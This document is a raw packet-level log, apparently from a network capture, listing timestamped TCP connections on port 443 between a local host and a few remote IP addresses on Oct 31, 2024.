                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.826642990 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.826658010 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.829632044 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.829664946 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.829826117 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.831782103 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.831794977 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.832011938 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.860891104 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.860933065 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.861063957 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.861315012 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.861350060 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.861706972 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.861721992 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.862023115 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:02.862040043 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.523426056 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.523467064 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.523612022 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.523977995 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.523988008 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.554732084 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.593803883 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.597729921 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.600562096 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.607131958 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.628890038 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.639797926 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.644048929 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.648302078 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.682137012 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.970587015 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.970623970 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.977251053 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.977269888 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.977576017 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.977612972 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.977974892 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.977982044 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.978199959 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.978214979 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.007329941 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.007349014 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.008279085 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.008313894 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.009449005 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.009458065 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.010438919 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.010471106 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.011626005 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.011646032 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.104959011 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.105035067 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.105300903 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.109987974 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.110059023 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.110140085 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.132472992 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.132553101 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.132616997 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.136439085 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.137016058 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.137079000 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.139894962 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.139962912 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.140300035 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.149899960 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.149930954 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.149945974 CET49838443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.149952888 CET4434983813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.150099039 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.150105953 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.150115013 CET49836443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.150118113 CET4434983613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.154977083 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.155009985 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.155035973 CET49839443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.155042887 CET4434983913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.184746981 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.184786081 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.184801102 CET49837443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.184808016 CET4434983713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.187411070 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.187448025 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.187484026 CET49840443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.187491894 CET4434984013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.252904892 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.300586939 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.410187006 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.410212994 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.410845995 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.444120884 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.444365978 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.447144985 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.447208881 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.447237968 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.458250046 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.458312035 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.458379984 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.460372925 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.460401058 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.491334915 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.651407003 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.651453972 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.651523113 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.652668953 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.652729034 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.652791023 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.653836012 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.653857946 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.653912067 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.662832975 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.662903070 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.662931919 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.670568943 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.670655012 CET44349846206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.670706987 CET49846443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.682293892 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.682318926 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.682944059 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.682979107 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.683407068 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.683418989 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.707211018 CET49851443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.707261086 CET4434985113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.707331896 CET49851443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.720998049 CET49852443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.721050978 CET4434985213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.721112967 CET49852443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.721357107 CET49851443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.721390963 CET4434985113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.742696047 CET49852443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.742731094 CET4434985213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.985280037 CET49854443192.168.2.9142.250.185.228
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.985328913 CET44349854142.250.185.228192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.985400915 CET49854443192.168.2.9142.250.185.228
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.985913992 CET49854443192.168.2.9142.250.185.228
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.985928059 CET44349854142.250.185.228192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.072700977 CET49856443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.072709084 CET44349856206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.072810888 CET49856443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.073051929 CET49856443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.073060989 CET44349856206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.073699951 CET49857443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.073736906 CET44349857206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.073815107 CET49857443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.074065924 CET49857443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.074076891 CET44349857206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.150475025 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.151403904 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.151429892 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.152534962 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.152667046 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.156783104 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.156847954 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.157318115 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.157331944 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.157355070 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.172310114 CET49862443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.172348976 CET44349862206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.172420025 CET49862443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.172746897 CET49862443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.172759056 CET44349862206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.203327894 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.229578018 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.367456913 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.367595911 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.367611885 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.368660927 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.368855000 CET44349847206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.368916035 CET49847443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.380714893 CET49863443192.168.2.9142.250.185.228
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.380765915 CET44349863142.250.185.228192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.380839109 CET49863443192.168.2.9142.250.185.228
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381108999 CET49864443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381145954 CET44349864206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381202936 CET49864443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381373882 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381382942 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381434917 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381772995 CET49863443192.168.2.9142.250.185.228
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381787062 CET44349863142.250.185.228192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381941080 CET49864443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.381949902 CET44349864206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.382097960 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.382110119 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.400949001 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.401444912 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.401467085 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.401937008 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.401952982 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.410814047 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.411325932 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.411361933 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.411782980 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.411787987 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.427150965 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.427736998 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.427757978 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.428271055 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.428276062 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.459453106 CET4434985113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.460177898 CET49851443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.460201025 CET4434985113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.460953951 CET49851443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.460958004 CET4434985113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.463670015 CET4434985213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.464063883 CET49852443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.464090109 CET4434985213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.464488983 CET49852443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.464493990 CET4434985213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.533154011 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.535115957 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.535262108 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.535262108 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.535336971 CET49848443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.535353899 CET4434984813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.537928104 CET49866443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.537975073 CET4434986613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.538078070 CET49866443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.538208008 CET49866443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.538219929 CET4434986613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.541640997 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.541718960 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.541800022 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.541915894 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.541935921 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.541948080 CET49849443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.541954041 CET4434984913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.544313908 CET49867443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.544363022 CET4434986713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.544454098 CET49867443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.544562101 CET49867443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.544574022 CET4434986713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.558614016 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.558794975 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.558900118 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.558939934 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.558939934 CET49850443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.558959007 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.558973074 CET4434985013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.561800957 CET49868443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.561840057 CET4434986813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.561914921 CET49868443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.562037945 CET49868443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:05.562050104 CET4434986813.107.246.45192.168.2.9
